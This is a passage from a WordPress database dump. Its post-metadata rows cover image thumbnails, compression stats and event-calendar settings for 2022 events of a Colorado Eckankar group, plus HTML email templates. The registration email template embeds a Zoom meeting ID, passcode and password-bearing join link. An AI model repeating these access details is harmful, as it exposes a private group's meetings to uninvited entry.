:4:\"file\";s:24:\"waterfalls-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8812;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"waterfalls-2-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:96413;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:24:\"waterfalls-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:29164;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:24:\"waterfalls-2-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:48111;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:24:\"waterfalls-2-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:33684;}s:8:\"tileview\";a:5:{s:4:\"file\";s:24:\"waterfalls-2-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:34940;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(165833,266839,'original-file','2022/07/waterfalls-2-updraft-pre-smush-original.jpg'),(165834,266839,'smush-info','The file was compressed from 117.47 KB to 111.53 KB saving 5.05 percent using WP-Optimize'),(165836,266839,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:120286;s:12:\"smushed-size\";i:114206;s:15:\"savings-percent\";d:5.05;s:10:\"sizes-info\";a:5:{s:4:\"full\";a:2:{s:8:\"original\";i:120286;s:10:\"compressed\";i:114206;}s:6:\"medium\";a:2:{s:8:\"original\";i:18729;s:10:\"compressed\";i:18326;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:8812;s:10:\"compressed\";i:8746;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:29164;s:10:\"compressed\";i:28532;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:33684;s:10:\"compressed\";i:32864;}}}'),(165835,266839,'smush-complete','1'),(165837,266841,'mec_color',''),(165838,266841,'mec_location_id','118'),(165839,266841,'mec_dont_show_map','0'),(165840,266841,'mec_organizer_id','1'),(165841,266841,'mec_read_more',''),(165842,266841,'mec_more_info',''),(165843,266841,'mec_more_info_title',''),(165844,266841,'mec_more_info_target','_self'),(165845,266841,'mec_cost',''),(165846,266841,'mec_currency','a:0:{}'),(165847,266841,'mec_additional_organizer_ids','a:0:{}'),(165848,266841,'mec_additional_location_ids','a:0:{}'),(165849,266841,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-07-09\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-07-09\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(165850,266841,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(165851,266841,'mec_certain_weekdays','a:0:{}'),(165852,266841,'mec_allday','0'),(165853,266841,'one_occurrence','0'),(165854,266841,'mec_hide_time','0'),(165855,266841,'mec_hide_end_time','0'),(165856,266841,'mec_comment',''),(165857,266841,'mec_timezone','global'),(165858,266841,'mec_countdown_method','global'),(165859,266841,'mec_public','1'),(165860,266841,'mec_start_date','2022-07-09'),(165861,266841,'mec_start_time_hour','10'),(165862,266841,'mec_start_time_minutes','30'),(165863,266841,'mec_start_time_ampm','AM'),(165864,266841,'mec_start_day_seconds','37800'),(165865,266841,'mec_end_date','2022-07-09'),(165866,266841,'mec_end_time_hour','11'),(165867,266841,'mec_end_time_minutes','30'),(165868,266841,'mec_end_time_ampm','PM'),(165869,266841,'mec_end_day_seconds','84600'),(165870,266841,'mec_repeat_status','0'),(165871,266841,'mec_repeat_type',''),(165872,266841,'mec_repeat_interval','1'),(165873,266841,'mec_repeat_end',''),(165874,266841,'mec_repeat_end_at_occurrences',''),(165875,266841,'mec_repeat_end_at_date',''),(165876,266841,'mec_advanced_days','a:0:{}'),(165877,266841,'mec_in_days',''),(165878,266841,'mec_not_in_days',''),(165879,266841,'mec_hourly_schedules','a:0:{}'),(165880,266841,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:1:\"1\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(165881,266841,'mec_tickets','a:0:{}'),(165882,266841,'mec_fees_global_inheritance','1'),(165883,266841,'mec_fees','a:0:{}'),(165884,266841,'mec_ticket_variations_global_inheritance','1'),(165885,266841,'mec_ticket_variations','a:0:{}'),(165886,266841,'mec_reg_fields_global_inheritance','1'),(165887,266841,'mec_reg_fields','a:0:{}'),(165888,266841,'mec_bfixed_fields','a:0:{}'),(165889,266841,'mec_op','a:0:{}'),(165890,266841,'mec_fields','a:0:{}'),(165891,266841,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:27:\"Eckankar Event Registration\";s:7:\"content\";s:6107:\"<p>\r\n<style>\r\n    table, td, div, h1, p \r\n      font-family: Arial, sans-serif;\r\n    }\r\n    @media screen and (max-width: 530px) {<br />\r\n      .unsub {<br />\r\n        display: block;<br />\r\n        padding: 8px;<br />\r\n        margin-top: 14px;<br />\r\n        border-radius: 6px;<br />\r\n        background-color: #555555;<br />\r\n        text-decoration: none !important;<br />\r\n        font-weight: bold;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 100% !important;<br />\r\n      }<br />\r\n    }<br />\r\n    @media screen and (min-width: 531px) {<br />\r\n      .col-sml {<br />\r\n        max-width: 27% !important;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 73% !important;<br />\r\n      }<br />\r\n    }<br />\r\n  </style>\r\n</p>\r\n<p>&nbsp;</p>\r\n<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><img class=\"alignnone wp-image-266520 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2022/03/email-img-registration-597-bluframe-whitetext-9.png\" alt=\"\" width=\"604\" height=\"145\" /></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #1d5791; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>Event Registration Confirmation</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\">\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px;\"><b>Hello %%first_name%% and thank you for registering!</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 20px;\">You are signed up for the following online event:</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b><span style=\"color: #1d5791;\">Title: </span>%%event_title%%</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b style=\"color: #1d5791;\">Date: </b>%%event_start_date%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b style=\"color: #1d5791;\">Time: </b>%%event_start_time%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 15px;\"> </p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px; color: #1d5791;\"><b>Zoom Login Information:</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b>Meeting ID: </b> 923 1691 4318<br />\r\n<b>Passcode:</b> 938668</p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><a href=\"https://zoom.us/j/92316914318?pwd=VHFxMFJ3T3FhcSt6eUZlejZ6bXRaUT09\">https://zoom.us/j/92316914318?pwd=VHFxMFJ3T3FhcSt6eUZlejZ6bXRaUT09</a></p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><b>Dial-in number: </b>720-707-2699 (for those who need to join by phone)</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">After you click the link, you will be prompted to either download the app to enter the meeting or enter through your browser. Please note that Zoom works best if you download the app. It is more stable and has more functions. Select use computer audio for sound.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">Please join the meeting 5 - 10 minutes ahead of time to help us start on time. We look forward to seeing you at this online event.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">See you there!</p>\r\n</div>\r\n<p><!-- [if mso]>\r\n                </td>\r\n</tr>\r\n</table>\r\n<p>                <![endif]--></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\">You are receiving this email because you have submitted a request through the <a href=\"https://eckankar-colorado.org/\">Eckankar in Colorado</a> website. If you have any questions regarding the origin of this email, please feel free to get in touch, we\'re always happy to help out.</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span><br />\r\n<span style=\"font-family: arial, helvetica, sans-serif;\"><a title=\"Contact Us\" href=\"mailto:webmaster@eckankar-colorado.org\"><span style=\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\">Contact Us</span></a></span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:22:\"New Event Registration\";s:7:\"content\";s:9874:\"<!-- [if !mso]><!--><!--<![endif]--><!-- [if (gte mso 9)|(IE)]>\r\n\r\n      <xml>\r\n        <o:OfficeDocumentSettings>\r\n          <o:AllowPNG/>\r\n          <o:PixelsPerInch>96</o:PixelsPerInch>\r\n        </o:OfficeDocumentSettings>\r\n      </xml>\r\n      <![endif]--><!-- [if (gte mso 9)|(IE)]>\r\n  \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<style type=\"text/css\">\r\n    body {width: 600px;margin: 0 auto;}\r\n    table {border-collapse: collapse;}\r\n    table, td {mso-table-lspace: 0pt;mso-table-rspace: 0pt;}\r\n    img {-ms-interpolation-mode: bicubic;}\r\n  </style>\r\n<![endif]-->\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<p>\r\n<style type=\"text/css\">\r\n    body, p, div {\r\n      font-family: inherit;\r\n      font-size: 14px;\r\n    }\r\n    body {\r\n      color: #000000;\r\n    }\r\n    body a {\r\n      color: #1188E6;\r\n      text-decoration: none;\r\n    }\r\n    p { margin: 0; padding: 0; }\r\n    table.wrapper {\r\n      width:100% !important;\r\n      table-layout: fixed;\r\n      -webkit-font-smoothing: antialiased;\r\n      -webkit-text-size-adjust: 100%;\r\n      -moz-text-size-adjust: 100%;\r\n      -ms-text-size-adjust: 100%;\r\n    }\r\n    img.max-width {\r\n      max-width: 100% !important;\r\n    }\r\n    .column.of-2 {\r\n      width: 50%;\r\n    }\r\n    .column.of-3 {\r\n      width: 33.333%;\r\n    }\r\n    .column.of-4 {\r\n      width: 25%;\r\n    }\r\n    ul ul ul ul  {\r\n      list-style-type: disc !important;\r\n    }\r\n    ol ol {\r\n      list-style-type: lower-roman !important;\r\n    }\r\n    ol ol ol {\r\n      list-style-type: lower-latin !important;\r\n    }\r\n    ol ol ol ol {\r\n      list-style-type: decimal !important;\r\n    }\r\n    @media screen and (max-width:480px) {\r\n      .preheader .rightColumnContent,\r\n      .footer .rightColumnContent {\r\n        text-align: left !important;\r\n      }\r\n      .preheader .rightColumnContent div,\r\n      .preheader .rightColumnContent span,\r\n      .footer .rightColumnContent div,\r\n      .footer .rightColumnContent span {\r\n        text-align: left !important;\r\n      }\r\n      .preheader .rightColumnContent,\r\n      .preheader .leftColumnContent {\r\n        font-size: 80% !important;\r\n        padding: 5px 0;\r\n      }\r\n      table.wrapper-mobile {\r\n        width: 100% !important;\r\n        table-layout: fixed;\r\n      }\r\n      img.max-width {\r\n        height: auto !important;\r\n        max-width: 100% !important;\r\n      }\r\n      a.bulletproof-button {\r\n        display: block !important;\r\n        width: auto !important;\r\n        font-size: 80%;\r\n        padding-left: 0 !important;\r\n        padding-right: 0 !important;\r\n      }\r\n      .columns {\r\n        width: 100% !important;\r\n      }\r\n      .column {\r\n        display: block !important;\r\n        width: 100% !important;\r\n        padding-left: 0 !important;\r\n        padding-right: 0 !important;\r\n        margin-left: 0 !important;\r\n        margin-right: 0 !important;\r\n      }\r\n      .social-icon-column {\r\n        display: inline-block !important;\r\n      }\r\n    }\r\n  </style>\r\n</p>\r\n<p>\r\n<style>\r\nbody {font-family: \'Muli\', sans-serif;}\r\n</style>\r\n</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<!--user entered Head Start--><!--End Head user entered--><center class=\"wrapper\" data-link-color=\"#1188E6\" data-body-style=\"font-size:14px; font-family:inherit; color:#000000; background-color:#FFFFFF;\">\r\n<div class=\"webkit\">\r\n<table class=\"wrapper\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" bgcolor=\"#FFFFFF\">\r\n<tbody>\r\n<tr>\r\n<td valign=\"top\" bgcolor=\"#FFFFFF\" width=\"100%\">\r\n<table class=\"outer\" role=\"content-container\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td width=\"100%\">\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><!-- [if mso]>\r\n    <center>\r\n    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<table>\r\n<tr>\r\n<td width=\"600\">\r\n  <![endif]-->\r\n<table style=\"width: 100%; max-width: 600px;\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0px 0px 0px 0px; color: #000000; text-align: left;\" role=\"modules-container\" align=\"left\" bgcolor=\"#FFFFFF\" width=\"100%\">\r\n<table class=\"module preheader preheader-hide\" style=\"display: none !important; mso-hide: all; visibility: hidden; opacity: 0; color: transparent; height: 0; width: 0;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"preheader\">\r\n<tbody>\r\n<tr>\r\n<td role=\"module-content\">\r\n<p>&nbsp;</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table style=\"padding: 30px 20px 30px 20px;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" bgcolor=\"#f6f6f6\" data-type=\"columns\" data-distribution=\"1\">\r\n<tbody>\r\n<tr role=\"module-content\">\r\n<td valign=\"top\" height=\"100%\">\r\n<table class=\"column column-0\" style=\"width: 540px; border-spacing: 0; border-collapse: collapse; margin: 0px 10px 0px 10px;\" border=\"0\" width=\"540\" cellspacing=\"0\" cellpadding=\"0\" align=\"left\" bgcolor=\"\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0px; margin: 0px; border-spacing: 0;\">\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"6c9e9414-eb30-47e2-97d8-7bd6a4df5990\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 0px 10px 0px; line-height: 24px; text-align: inherit;\" role=\"module-content\" valign=\"top\" bgcolor=\"\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"color: #1d5791; font-family: arial, helvetica, sans-serif; font-size: 36px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto;\">Admin Notification</span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"948e3f3f-5214-4721-a90e-625a47b1c957\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 30px 18px 30px; line-height: 26px; text-align: inherit; background-color: #efefef;\" role=\"module-content\" valign=\"top\" bgcolor=\"#efefef\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"color: #707172; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>New Event Registration</strong></span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a10dcb57-ad22-4f4d-b765-1d427dfddb4e\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 30px 18px 30px; line-height: 22px; text-align: inherit; background-color: #ffffff;\" role=\"module-content\" valign=\"top\" bgcolor=\"#ffffff\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 20px; color: #333333;\"><strong>A new registration has been submitted for the following event:</strong></span></div>\r\n<p>&nbsp;</p>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>%%event_title%%</strong></span></div>\r\n<div></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Date: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_date%%</strong></span></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Time: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_time%%</strong></span> </div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a4e5faa9-7044-47fd-a4a1-b7a1746c258e\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 0px 18px 5px; line-height: 22px; text-align: inherit; background-color: #efefef;\" role=\"module-content\" valign=\"top\" bgcolor=\"#efefef\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"font-size: 14pt;\">%%attendees_full_info%%</span> </div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a265ebb9-ab9c-43e8-9009-54d6151b1600\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 8px 30px 40px 28px; line-height: 22px; text-align: inherit; background-color: #6e6e6e;\" role=\"module-content\" valign=\"top\" bgcolor=\"#6e6e6e\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"></div>\r\n<figure style=\"text-align: center;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px;\">© Eckankar In Colorado -2022</span></figure>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<!-- [if mso]>\r\n                                  </td>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                                </tr>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                              </table>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                            </center>\r\n                            <![endif]--></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</center>\";}}'),(165892,266841,'mec_event_status','EventScheduled'),(165893,266841,'mec_moved_online_link',''),(165894,266841,'mec_cancelled_reason',''),(165895,266841,'mec_display_cancellation_reason_in_single_page',''),(165896,266841,'protect_children',''),(165897,266841,'passster_activate_global_protection',NULL),(165898,266841,'passster_activate_protection',NULL),(165899,266841,'passster_protection_type','password'),(165900,266841,'boldgrid_hide_page_title','0'),(165901,266841,'_thumbnail_id','266472'),(165902,266841,'_oembed_ace4d65561aa575fe8833c60d61f4161','{{unknown}}'),(165903,266841,'boldgrid_in_page_containers','1'),(165905,266841,'_dp_original','266522'),(165906,266841,'_edit_lock','1656792801:2'),(165907,266841,'_edit_last','2'),(165908,266844,'protect_children',''),(165909,266844,'mec_color',''),(165910,266844,'mec_location_id','131'),(165911,266844,'mec_dont_show_map','0'),(165912,266844,'mec_organizer_id','1'),(165913,266844,'mec_read_more',''),(165914,266844,'mec_more_info',''),(165915,266844,'mec_more_info_title',''),(165916,266844,'mec_more_info_target','_self'),(165917,266844,'mec_cost',''),(165918,266844,'mec_currency','a:0:{}'),(165919,266844,'mec_additional_organizer_ids','a:0:{}'),(165920,266844,'mec_additional_location_ids','a:0:{}'),(165921,266844,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-07-24\";s:4:\"hour\";s:1:\"1\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-07-24\";s:4:\"hour\";s:1:\"2\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(165922,266844,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(165923,266844,'mec_certain_weekdays','a:0:{}'),(165924,266844,'mec_allday','0'),(165925,266844,'one_occurrence','0'),(165926,266844,'mec_hide_time','0'),(165927,266844,'mec_hide_end_time','0'),(165928,266844,'mec_comment',''),(165929,266844,'mec_timezone','global'),(165930,266844,'mec_countdown_method','global'),(165931,266844,'mec_public','1'),(165932,266844,'mec_start_date','2022-07-24'),(165933,266844,'mec_start_time_hour','1'),(165934,266844,'mec_start_time_minutes','0'),(165935,266844,'mec_start_time_ampm','PM'),(165936,266844,'mec_start_day_seconds','46800'),(165937,266844,'mec_end_date','2022-07-24'),(165938,266844,'mec_end_time_hour','2'),(165939,266844,'mec_end_time_minutes','30'),(165940,266844,'mec_end_time_ampm','PM'),(165941,266844,'mec_end_day_seconds','52200'),(165942,266844,'mec_repeat_status','0'),(165943,266844,'mec_repeat_type',''),(165944,266844,'mec_repeat_interval','1'),(165945,266844,'mec_repeat_end',''),(165946,266844,'mec_repeat_end_at_occurrences',''),(165947,266844,'mec_repeat_end_at_date',''),(165948,266844,'mec_advanced_days','a:0:{}'),(165949,266844,'mec_in_days',''),(165950,266844,'mec_not_in_days',''),(165951,266844,'mec_hourly_schedules','a:0:{}'),(165952,266844,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s: